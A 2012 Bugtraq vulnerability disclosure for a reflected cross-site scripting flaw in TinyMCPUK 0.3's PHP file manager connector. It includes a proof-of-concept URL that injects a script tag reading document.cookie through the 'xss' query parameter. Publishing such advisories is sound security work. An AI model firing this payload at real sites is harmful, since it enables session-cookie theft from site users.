[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201212031020.qB3AKNJB005614@sf01web1.securityfocus.com>
Date: Mon, 3 Dec 2012 10:20:23 GMT
From: admin@...elweiss.info
To: bugtraq@...urityfocus.com
Subject: tinymcpuk xss vulnerability
=================================================================
tinymcpuk xss vulnerability
=================================================================
# Exploit Title: tinymcpuk xss vulnerability
# Google Dork: n/a
# Date: 1/12/2012 (GMT+7)
# Exploit Author: eidelweiss (@randyarios)
# Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/
# Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/
# Version: 0.3
# Tested on: windows & Ubuntu Linux
[!] about
TinyMCPUK - TinyMCE with file/image manager.
TinyMCPUK brings you the powerful TinyMCE plus
the MCPUK file manager and ImageManager
strictly integrated together.
[!] exploit & p0c
/tinymcpuk/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
[!] sample poc
http://host/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
==========================| -=[ E0F ]=- |==========================
Nb: Graatz to om wenk and all DC member.. sorry om Suntuk banget gue wkakwakwkawk.. bavod!!!
Powered by blists - more mailing lists